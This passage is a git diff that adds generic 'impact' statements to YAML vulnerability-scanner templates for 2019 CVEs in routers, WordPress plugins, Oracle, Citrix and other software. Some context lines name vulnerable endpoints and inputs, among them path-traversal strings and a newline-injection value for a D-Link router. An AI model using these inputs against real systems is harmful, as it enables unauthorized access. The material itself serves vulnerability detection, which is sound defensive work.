| + Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system. remediation: | Upgrade to a patched version of nostromo web server (1.9.7 or later) or apply the vendor-supplied patch. reference: diff --git a/http/cves/2019/CVE-2019-16313.yaml b/http/cves/2019/CVE-2019-16313.yaml index 072e83a228..baae178662 100644 --- a/http/cves/2019/CVE-2019-16313.yaml +++ b/http/cves/2019/CVE-2019-16313.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: ifw8 Router ROM v4.31 is vulnerable to credential disclosure via action/usermanager.htm HTML source code. + impact: | + An attacker can exploit this vulnerability to discover sensitive credentials. remediation: | Update the ifw8 Router ROM to a version that is not affected by CVE-2019-16313. reference: diff --git a/http/cves/2019/CVE-2019-16332.yaml b/http/cves/2019/CVE-2019-16332.yaml index 787c95223f..ecd8675f50 100644 --- a/http/cves/2019/CVE-2019-16332.yaml +++ b/http/cves/2019/CVE-2019-16332.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress API Bearer Auth plugin before 20190907 contains a cross-site scripting vulnerability. The server parameter is not correctly filtered in swagger-config.yaml.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions. remediation: | Update to the latest version of WordPress API Bearer Auth plugin (20190907 or later) to mitigate the vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-16525.yaml b/http/cves/2019/CVE-2019-16525.yaml index 46f76f2c51..4ffe97e1af 100644 --- a/http/cves/2019/CVE-2019-16525.yaml +++ b/http/cves/2019/CVE-2019-16525.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress Checklist plugin before 1.1.9 contains a cross-site scripting vulnerability. The fill parameter is not correctly filtered in the checklist-icon.php file. + impact: | + Allows attackers to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions. remediation: | Update to the latest version of the WordPress Checklist plugin (1.1.9 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-1653.yaml b/http/cves/2019/CVE-2019-1653.yaml index 47893c9fbc..dfb6a7a118 100644 --- a/http/cves/2019/CVE-2019-1653.yaml +++ b/http/cves/2019/CVE-2019-1653.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an unauthenticated remote attacker to retrieve sensitive information due to improper access controls for URLs. An attacker could exploit this vulnerability by connecting to an affected device via HTTP or HTTPS and requesting specific URLs. A successful exploit could allow the attacker to download the router configuration or detailed diagnostic information. + impact: | + An attacker can exploit this vulnerability to gain access to sensitive information, potentially leading to further attacks. remediation: | Cisco has released firmware updates that address this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-16662.yaml b/http/cves/2019/CVE-2019-16662.yaml index 9f076dfad9..6ff88b4178 100644 --- a/http/cves/2019/CVE-2019-16662.yaml +++ b/http/cves/2019/CVE-2019-16662.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: rConfig 3.9.2 is susceptible to a remote code execution vulnerability. An attacker can directly execute system commands by sending a GET request to ajaxServerSettingsChk.php because the rootUname parameter is passed to the exec function without filtering, which can lead to command execution. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data theft, and complete compromise of the affected system. remediation: | Upgrade to a patched version of rConfig (3.9.3 or later) or apply the vendor-supplied patch to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-16759.yaml b/http/cves/2019/CVE-2019-16759.yaml index 5f3451e227..8081dc381a 100644 --- a/http/cves/2019/CVE-2019-16759.yaml +++ b/http/cves/2019/CVE-2019-16759.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: critical description: vBulletin 5.0.0 through 5.5.4 is susceptible to a remote command execution vulnerability via the widgetConfig parameter in an ajax/render/widget_php routestring request. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the target system. remediation: | Upgrade vBulletin to a version that is not affected by CVE-2019-16759. reference: diff --git a/http/cves/2019/CVE-2019-16920.yaml b/http/cves/2019/CVE-2019-16920.yaml index 371fa24352..ca50e34521 100644 --- a/http/cves/2019/CVE-2019-16920.yaml +++ b/http/cves/2019/CVE-2019-16920.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565 contain an unauthenticated remote code execution vulnerability. The issue occurs when the attacker sends an arbitrary input to a "PingTest" device common gateway interface that could lead to common injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these issues also affected; DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the affected router, potentially leading to complete compromise of the device and the network it is connected to. remediation: | Apply the latest firmware update provided by D-Link to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-16931.yaml b/http/cves/2019/CVE-2019-16931.yaml index b38290bacf..477109b5e5 100644 --- a/http/cves/2019/CVE-2019-16931.yaml +++ b/http/cves/2019/CVE-2019-16931.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Visualizer plugin before 3.3.1 contains a stored cross-site scripting vulnerability via /wp-json/visualizer/v1/update-chart WP-JSON API endpoint. An unauthenticated attacker can execute arbitrary JavaScript when an admin or other privileged user edits the chart via the admin dashboard. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update to the latest version of WordPress Visualizer plugin (3.3.1) or apply the provided patch to fix the XSS vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-16932.yaml b/http/cves/2019/CVE-2019-16932.yaml index 452579e443..059c85c7b2 100644 --- a/http/cves/2019/CVE-2019-16932.yaml +++ b/http/cves/2019/CVE-2019-16932.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Visualizer prior to 3.3.1 suffers from a blind server-side request forgery vulnerability via the /wp-json/visualizer/v1/upload-data endpoint. + impact: | + An attacker can exploit this vulnerability to send crafted requests to internal resources, potentially leading to unauthorized access or data leakage. remediation: | Update Visualizer plugin to version 3.3.1 or later to fix the SSRF vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-16996.yaml b/http/cves/2019/CVE-2019-16996.yaml index cd74bd299a..88b7485233 100644 --- a/http/cves/2019/CVE-2019-16996.yaml +++ b/http/cves/2019/CVE-2019-16996.yaml @@ -5,6 +5,8 @@ info: author: ritikchaddha severity: high description: Metinfo 7.0.0 beta is susceptible to SQL Injection in app/system/product/admin/product_admin.class.php via the admin/?n=product&c=product_admin&a=dopara&app_type=shop id parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to a patched version of Metinfo or apply the necessary security patches to mitigate the SQL Injection vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-16997.yaml b/http/cves/2019/CVE-2019-16997.yaml index 191bd7d6f5..3e06b60a4c 100644 --- a/http/cves/2019/CVE-2019-16997.yaml +++ b/http/cves/2019/CVE-2019-16997.yaml @@ -5,6 +5,8 @@ info: author: ritikchaddha severity: high description: Metinfo 7.0.0 beta is susceptible to SQL Injection in app/system/language/admin/language_general.class.php via the admin/?n=language&c=language_general&a=doExportPack appno parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to a patched version of Metinfo or apply the necessary security patches to mitigate the SQL Injection vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-17270.yaml b/http/cves/2019/CVE-2019-17270.yaml index 150568170a..f0606f5843 100644 --- a/http/cves/2019/CVE-2019-17270.yaml +++ b/http/cves/2019/CVE-2019-17270.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Yachtcontrol Webapplication 1.0 makes it possible to perform direct operating system commands as an unauthenticated user via the "/pages/systemcall.php?command={COMMAND}" page and parameter, where {COMMAND} will be executed and returning the results to the client. Affects Yachtcontrol webservers disclosed via Dutch GPRS/4G mobile IP-ranges. IP addresses vary due to DHCP client leasing of telco's. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the target system. remediation: | Apply the latest security patches or updates provided by the vendor to fix the remote command injection vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-17382.yaml b/http/cves/2019/CVE-2019-17382.yaml index 67535f5850..3eb4db20df 100644 --- a/http/cves/2019/CVE-2019-17382.yaml +++ b/http/cves/2019/CVE-2019-17382.yaml @@ -5,6 +5,8 @@ info: author: harshbothra_ severity: critical description: Zabbix through 4.4 is susceptible to an authentication bypass vulnerability via zabbix.php?action=dashboard.view&dashboardid=1. An attacker can bypass the login page and access the dashboard page, and then create a Dashboard, Report, Screen, or Map without any Username/Password (i.e., anonymously). All created elements (Dashboard/Report/Screen/Map) are accessible by other users and by an admin. + impact: | + Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to the Zabbix application. remediation: | Upgrade to a patched version of Zabbix (>=4.4) to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-17418.yaml b/http/cves/2019/CVE-2019-17418.yaml index fc4f549c29..9f35502a1f 100644 --- a/http/cves/2019/CVE-2019-17418.yaml +++ b/http/cves/2019/CVE-2019-17418.yaml @@ -6,6 +6,8 @@ info: severity: high description: | MetInfo 7.0.0 beta is susceptible to SQL injection via the admin/?n=language&c=language_general&a=doSearchParameter appno parameter (a different issue than CVE-2019-16997). + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to a patched version of MetInfo or apply the necessary security patches provided by the vendor. reference: diff --git a/http/cves/2019/CVE-2019-17444.yaml b/http/cves/2019/CVE-2019-17444.yaml index 7319970a5f..d20e7c9e34 100644 --- a/http/cves/2019/CVE-2019-17444.yaml +++ b/http/cves/2019/CVE-2019-17444.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Jfrog Artifactory prior to 6.17.0 uses default passwords (such as "password") for administrative accounts and does not require users to change them. This may allow unauthorized network-based attackers to completely compromise of Jfrog Artifactory. + impact: | + An attacker can gain unauthorized access to the Jfrog Artifactory instance. remediation: | Upgrade Jfrog Artifactory to version 6.17.0 or later and change the default admin password to a strong, unique one. reference: diff --git a/http/cves/2019/CVE-2019-17506.yaml b/http/cves/2019/CVE-2019-17506.yaml index 8a6121338d..cf7c8bf5ae 100644 --- a/http/cves/2019/CVE-2019-17506.yaml +++ b/http/cves/2019/CVE-2019-17506.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | D-Link DIR-868L B1-2.03 and DIR-817LW A1-1.04 routers are vulnerable to information disclosure vulnerabilities because certain web interfaces do not require authentication. An attacker can get the router's username and password (and other information) via a DEVICE.ACCOUNT value for SERVICES in conjunction with AUTHORIZED_GROUP=1%0a to getcfg.php. This could be used to control the router remotely. + impact: | + An attacker can exploit this vulnerability to gain access to sensitive information, such as router configuration settings and credentials. remediation: | Apply the latest firmware update provided by D-Link to fix the information disclosure vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-17538.yaml b/http/cves/2019/CVE-2019-17538.yaml index ff76f21cb2..f5c134ed96 100644 --- a/http/cves/2019/CVE-2019-17538.yaml +++ b/http/cves/2019/CVE-2019-17538.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Jiangnan Online Judge (aka jnoj) 0.8.0 is susceptible to local file inclusion via web/polygon/problem/viewfile?id=1&name=../. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, including system files and credentials. remediation: | Upgrade Jiangnan Online Judge to a patched version or apply the necessary security patches to fix the Local File Inclusion vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-17558.yaml b/http/cves/2019/CVE-2019-17558.yaml index 15c6832f31..f10482146f 100644 --- a/http/cves/2019/CVE-2019-17558.yaml +++ b/http/cves/2019/CVE-2019-17558.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu,madrobot severity: high description: Apache Solr versions 5.0.0 to 8.3.1 are vulnerable to remote code execution vulnerabilities through the VelocityResponseWriter. A Velocity template can be provided through Velocity templates in a configset `velocity/ directory or as a parameter. A user defined configset could contain renderable, potentially malicious, templates. Parameter provided templates are disabled by default, but can be enabled by setting `params.resource.loader.enabled by defining a response writer with that setting set to `true`. Defining a response writer requires configuration API access. Solr 8.4 removed the params resource loader entirely, and only enables the configset-provided template rendering when the configset is `trusted` (has been uploaded by an authenticated user). + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the affected system. remediation: | Upgrade to a patched version of Apache Solr (8.4.0 or later) to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-17574.yaml b/http/cves/2019/CVE-2019-17574.yaml index 6abec75f2e..23365a84cf 100644 --- a/http/cves/2019/CVE-2019-17574.yaml +++ b/http/cves/2019/CVE-2019-17574.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | An issue was discovered in the Popup Maker plugin before 1.8.13 for WordPress. An unauthenticated attacker can partially control the arguments of the do_action function to invoke certain popmake_ or pum_ methods, as demonstrated by controlling content and delivery of popmake-system-info.txt (aka the "support debug text file"). + impact: | + Unauthenticated attackers can gain administrative access to the WordPress site. remediation: | Update Popup-Maker plugin to version 1.8.12 or later. reference: diff --git a/http/cves/2019/CVE-2019-17662.yaml b/http/cves/2019/CVE-2019-17662.yaml index 0623bb2b0e..fbe2d36a08 100644 --- a/http/cves/2019/CVE-2019-17662.yaml +++ b/http/cves/2019/CVE-2019-17662.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | ThinVNC 1.0b1 is vulnerable to arbitrary file read, which leads to a compromise of the VNC server. The vulnerability exists even when authentication is turned on during the deployment of the VNC server. The password for authentication is stored in cleartext in a file that can be read via a ../../ThinVnc.ini directory traversal attack vector. + impact: | + An attacker can bypass authentication and gain unauthorized access to the ThinVNC application. remediation: | Upgrade to a patched version of ThinVNC or implement additional authentication mechanisms. reference: diff --git a/http/cves/2019/CVE-2019-18393.yaml b/http/cves/2019/CVE-2019-18393.yaml index c391a13b40..e1beb43d7a 100644 --- a/http/cves/2019/CVE-2019-18393.yaml +++ b/http/cves/2019/CVE-2019-18393.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Ignite Realtime Openfire through 4.4.2 is vulnerable to local file inclusion via PluginServlet.java. It does not ensure that retrieved files are located under the Openfire home directory. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, and potential compromise of the affected system. remediation: | Upgrade Ignite Realtime Openfire to version 4.42 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-18394.yaml b/http/cves/2019/CVE-2019-18394.yaml index 09fa772cd7..b5e6bf55ab 100644 --- a/http/cves/2019/CVE-2019-18394.yaml +++ b/http/cves/2019/CVE-2019-18394.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: critical description: Ignite Realtime Openfire through version 4.4.2 allows attackers to send arbitrary HTTP GET requests in FaviconServlet.java, resulting in server-side request forgery. + impact: | + An attacker can exploit this vulnerability to send crafted requests to internal resources, leading to unauthorized access or information disclosure. remediation: | Upgrade to the latest version of Ignite Realtime Openfire (>=4.4.3) to fix this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-18665.yaml b/http/cves/2019/CVE-2019-18665.yaml index fd9799d916..382e316ef0 100644 --- a/http/cves/2019/CVE-2019-18665.yaml +++ b/http/cves/2019/CVE-2019-18665.yaml @@ -6,6 +6,8 @@ info: severity: high description: | SECUDOS DOMOS before 5.6 allows local file inclusion via the log module. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server. remediation: | Apply the latest patch or update to a version that is not affected by this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-18818.yaml b/http/cves/2019/CVE-2019-18818.yaml index 09704a49b5..3a8f82d94f 100644 --- a/http/cves/2019/CVE-2019-18818.yaml +++ b/http/cves/2019/CVE-2019-18818.yaml @@ -5,6 +5,8 @@ info: author: idealphase severity: critical description: strapi CMS before 3.0.0-beta.17.5 allows admin password resets because it mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js. + impact: | + An attacker can exploit this vulnerability to reset the admin password and gain unauthorized access to the Strapi CMS admin panel. remediation: | Upgrade Strapi CMS to a version higher than 3.0.0-beta.17.5 to mitigate the vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-18922.yaml b/http/cves/2019/CVE-2019-18922.yaml index ec442c5fd8..5299d57c65 100644 --- a/http/cves/2019/CVE-2019-18922.yaml +++ b/http/cves/2019/CVE-2019-18922.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Allied Telesis AT-GS950/8 until Firmware AT-S107 V.1.1.3 is susceptible to local file inclusion via its web interface. + impact: | + Successful exploitation of this vulnerability allows an attacker to read arbitrary files on the affected device, leading to unauthorized access and potential data leakage. remediation: | Apply the latest firmware update provided by Allied Telesis to fix the vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-18957.yaml b/http/cves/2019/CVE-2019-18957.yaml index 37e513735a..f6b06e0f82 100644 --- a/http/cves/2019/CVE-2019-18957.yaml +++ b/http/cves/2019/CVE-2019-18957.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | MicroStrategy Library before 11.1.3 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: The issue can be resolved by downloading and installing 1.1.3, which has the patch. reference: - https://seclists.org/bugtraq/2019/Nov/23 diff --git a/http/cves/2019/CVE-2019-1898.yaml b/http/cves/2019/CVE-2019-1898.yaml index 6d6f9b021b..d014596225 100644 --- a/http/cves/2019/CVE-2019-1898.yaml +++ b/http/cves/2019/CVE-2019-1898.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A vulnerability in the web-based management interface of Cisco RV110W, RV130W, and RV215W Routers could allow an unauthenticated, remote attacker to access the syslog file on an affected device. The vulnerability is due to improper authorization of an HTTP request. An attacker could exploit this vulnerability by accessing the URL for the syslog file. A successful exploit could allow the attacker to access the information contained in the file. + impact: | + An attacker can exploit this vulnerability to gain sensitive information from the router. remediation: | Apply the latest firmware update provided by Cisco to fix the vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-19134.yaml b/http/cves/2019/CVE-2019-19134.yaml index a42be1d187..356e6cc2e9 100644 --- a/http/cves/2019/CVE-2019-19134.yaml +++ b/http/cves/2019/CVE-2019-19134.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress Hero Maps Premium plugin 2.2.1 and prior contains an unauthenticated reflected cross-site scripting vulnerability via the views/dashboard/index.php p parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. remediation: | Update to the latest version of the WordPress Hero Maps Premium plugin (>=2.2.2) or apply the vendor-provided patch to fix the XSS vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-19368.yaml b/http/cves/2019/CVE-2019-19368.yaml index 1aef5731d3..8c163e0953 100644 --- a/http/cves/2019/CVE-2019-19368.yaml +++ b/http/cves/2019/CVE-2019-19368.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: medium description: Rumpus FTP Web File Manager 8.2.9.1 contains a reflected cross-site scripting vulnerability via the Login page. An attacker can send a crafted link to end users and can execute arbitrary JavaScript. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of Rumpus FTP Web File Manager or apply the vendor-provided patch to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-1943.yaml b/http/cves/2019/CVE-2019-1943.yaml index 7a29dfff3c..950cfe74ef 100644 --- a/http/cves/2019/CVE-2019-1943.yaml +++ b/http/cves/2019/CVE-2019-1943.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Cisco Small Business 200,300 and 500 Series Switches contain an open redirect vulnerability in the Web UI. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the download of malware. remediation: | Apply the necessary patches or updates provided by Cisco to fix the open redirect vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-19781.yaml b/http/cves/2019/CVE-2019-19781.yaml index 01474400e2..f04bd59e6c 100644 --- a/http/cves/2019/CVE-2019-19781.yaml +++ b/http/cves/2019/CVE-2019-19781.yaml @@ -5,6 +5,8 @@ info: author: organiccrap,geeknik severity: critical description: Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0 are susceptible to directory traversal vulnerabilities. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, potential data leakage, and further compromise of the affected system. remediation: | Apply the necessary security patches provided by Citrix to fix the directory traversal vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-19824.yaml b/http/cves/2019/CVE-2019-19824.yaml index 5b69c5c114..6dd1606eaa 100644 --- a/http/cves/2019/CVE-2019-19824.yaml +++ b/http/cves/2019/CVE-2019-19824.yaml @@ -6,6 +6,8 @@ info: severity: high description: | TOTOLINK Realtek SDK based routers may allow an authenticated attacker to execute arbitrary OS commands via the sysCmd parameter to the boafrm/formSysCmd URI, even if the GUI (syscmd.htm) is not available. This allows for full control over the device's internals. This affects A3002RU through 2.0.0, A702R through 2.1.3, N301RT through 2.1.6, N302R through 3.4.0, N300RT through 3.4.0, N200RE through 4.0.0, N150RT through 3.4.0, and N100RE through 3.4.0. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected device. remediation: | Apply the latest firmware update provided by the vendor to fix the vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-19908.yaml b/http/cves/2019/CVE-2019-19908.yaml index c30a944fb2..536a6b1147 100644 --- a/http/cves/2019/CVE-2019-19908.yaml +++ b/http/cves/2019/CVE-2019-19908.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | phpMyChat-Plus 1.98 contains a cross-site scripting vulnerability via pmc_username parameter of pass_reset.php in password reset URL. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of phpMyChat-Plus or apply the necessary security patches to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-19985.yaml b/http/cves/2019/CVE-2019-19985.yaml index df11994ce1..2082ccc709 100644 --- a/http/cves/2019/CVE-2019-19985.yaml +++ b/http/cves/2019/CVE-2019-19985.yaml @@ -5,6 +5,8 @@ info: author: KBA@SOGETI_ESEC,madrobot,dwisiswant0 severity: medium description: WordPress Email Subscribers & Newsletters plugin before 4.2.3 is susceptible to arbitrary file retrieval via a flaw that allows unauthenticated file download and user information disclosure. An attacker can obtain sensitive information, modify data, and/or execute unauthorized administrative operations. + impact: | + An attacker can access sensitive files on the server, potentially leading to unauthorized access or data leakage. remediation: | Update to the latest version of WordPress Email Subscribers & Newsletters plugin (4.2.3) or apply the patch provided by the vendor. reference: diff --git a/http/cves/2019/CVE-2019-20085.yaml b/http/cves/2019/CVE-2019-20085.yaml index 2819373ab7..ada500aac5 100644 --- a/http/cves/2019/CVE-2019-20085.yaml +++ b/http/cves/2019/CVE-2019-20085.yaml @@ -6,6 +6,8 @@ info: severity: high description: | TVT NVMS-1000 devices allow GET /.. local file inclusion attacks. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive information stored on the system. remediation: | Apply the latest security patches or updates provided by the vendor to fix the local file inclusion vulnerability in TVT NVMS 1000 software. reference: diff --git a/http/cves/2019/CVE-2019-20183.yaml b/http/cves/2019/CVE-2019-20183.yaml index fac2df72fe..dea124d4d1 100644 --- a/http/cves/2019/CVE-2019-20183.yaml +++ b/http/cves/2019/CVE-2019-20183.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Simple Employee Records System 1.0 contains an arbitrary file upload vulnerability due to client-side validation of file extensions. This can be used to upload executable code to the server to obtain access or perform remote command execution. + impact: | + Successful exploitation of this vulnerability can result in unauthorized access to the system, remote code execution, and potential compromise of sensitive data. remediation: | Apply the latest patch or update to Simple Employee Records System 1.0 to fix the unrestricted file upload vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-20210.yaml b/http/cves/2019/CVE-2019-20210.yaml index 4524c6e47e..d68ee2f479 100644 --- a/http/cves/2019/CVE-2019-20210.yaml +++ b/http/cves/2019/CVE-2019-20210.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress CTHthemes CityBook before 2.3.4, TownHub before 1.0.6, and EasyBook before 1.2.2 themes contain reflected cross-site scripting vulnerabilities via a search query. + impact: | + Successful exploitation of this vulnerability can lead to session hijacking, defacement of the website, theft of sensitive information, or the installation of malware on the victim's system. remediation: | Update to the latest version of the WordPress CTHthemes plugin, which includes a fix for this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-20224.yaml b/http/cves/2019/CVE-2019-20224.yaml index 0ae86aa68e..305687125c 100644 --- a/http/cves/2019/CVE-2019-20224.yaml +++ b/http/cves/2019/CVE-2019-20224.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Pandora FMS 7.0NG allows remote authenticated users to execute arbitrary OS commands via shell metacharacters in the ip_src parameter in an index.php?operation/netflow/nf_live_view request. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized remote code execution, potentially compromising the entire system. remediation: This issue has been fixed in Pandora FMS 7.0 NG 742. reference: - https://shells.systems/pandorafms-v7-0ng-authenticated-remote-code-execution-cve-2019-20224/ diff --git a/http/cves/2019/CVE-2019-20933.yaml b/http/cves/2019/CVE-2019-20933.yaml index b0f741ba55..0e3427f97a 100644 --- a/http/cves/2019/CVE-2019-20933.yaml +++ b/http/cves/2019/CVE-2019-20933.yaml @@ -5,6 +5,8 @@ info: author: pussycat0x,c-sh0 severity: critical description: InfluxDB before 1.7.6 contains an authentication bypass vulnerability via the authenticate function in services/httpd/handler.go. A JWT token may have an empty SharedSecret (aka shared secret). An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + An attacker can bypass authentication and gain unauthorized access to the InfluxDB database. remediation: Update Influxdb to version 1.7.6~rc0-1 or higher. reference: - https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933 diff --git a/http/cves/2019/CVE-2019-2578.yaml b/http/cves/2019/CVE-2019-2578.yaml index ca9fd6f2c0..7280b23277 100644 --- a/http/cves/2019/CVE-2019-2578.yaml +++ b/http/cves/2019/CVE-2019-2578.yaml @@ -5,6 +5,8 @@ info: author: leovalcante severity: high description: Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 suffers from broken access control. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebCenter Sites accessible data. + impact: | + Successful exploitation of this vulnerability could allow an attacker to gain unauthorized access to sensitive information or perform unauthorized actions. remediation: | Apply the necessary patches or updates provided by Oracle to fix the Broken Access Control vulnerability (CVE-2019-2578). reference: diff --git a/http/cves/2019/CVE-2019-2579.yaml b/http/cves/2019/CVE-2019-2579.yaml index beaca84ef8..e5efce7b56 100644 --- a/http/cves/2019/CVE-2019-2579.yaml +++ b/http/cves/2019/CVE-2019-2579.yaml @@ -5,6 +5,8 @@ info: author: leovalcante severity: medium description: The Oracle WebCenter Sites component of Oracle Fusion Middleware 12.2.1.3.0 is susceptible to SQL injection via an easily exploitable vulnerability that allows low privileged attackers with network access via HTTP to compromise Oracle WebCenter Sites. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle WebCenter Sites accessible data. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL commands, potentially leading to unauthorized access, data manipulation, or denial of service. remediation: | Apply the necessary patches or updates provided by Oracle to mitigate the SQL Injection vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-2588.yaml b/http/cves/2019/CVE-2019-2588.yaml index 1f8ca48351..20375c1e1e 100644 --- a/http/cves/2019/CVE-2019-2588.yaml +++ b/http/cves/2019/CVE-2019-2588.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Oracle Business Intelligence versions 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0 are vulnerable to path traversal in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware (subcomponent: BI Publisher Security). + impact: | + An attacker can read sensitive files on the system, potentially leading to unauthorized access or exposure of sensitive information. remediation: | Apply the necessary patches or updates provided by Oracle to fix the path traversal vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-2616.yaml b/http/cves/2019/CVE-2019-2616.yaml index 677d3d3e36..010d59e486 100644 --- a/http/cves/2019/CVE-2019-2616.yaml +++ b/http/cves/2019/CVE-2019-2616.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: high description: Oracle Business Intelligence and XML Publisher 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 are vulnerable to an XML external entity injection attack. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server or conduct server-side request forgery (SSRF) attacks. remediation: | Apply the necessary patches or updates provided by Oracle to fix this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-2729.yaml b/http/cves/2019/CVE-2019-2729.yaml index da53d8eeb9..322b204b8d 100644 --- 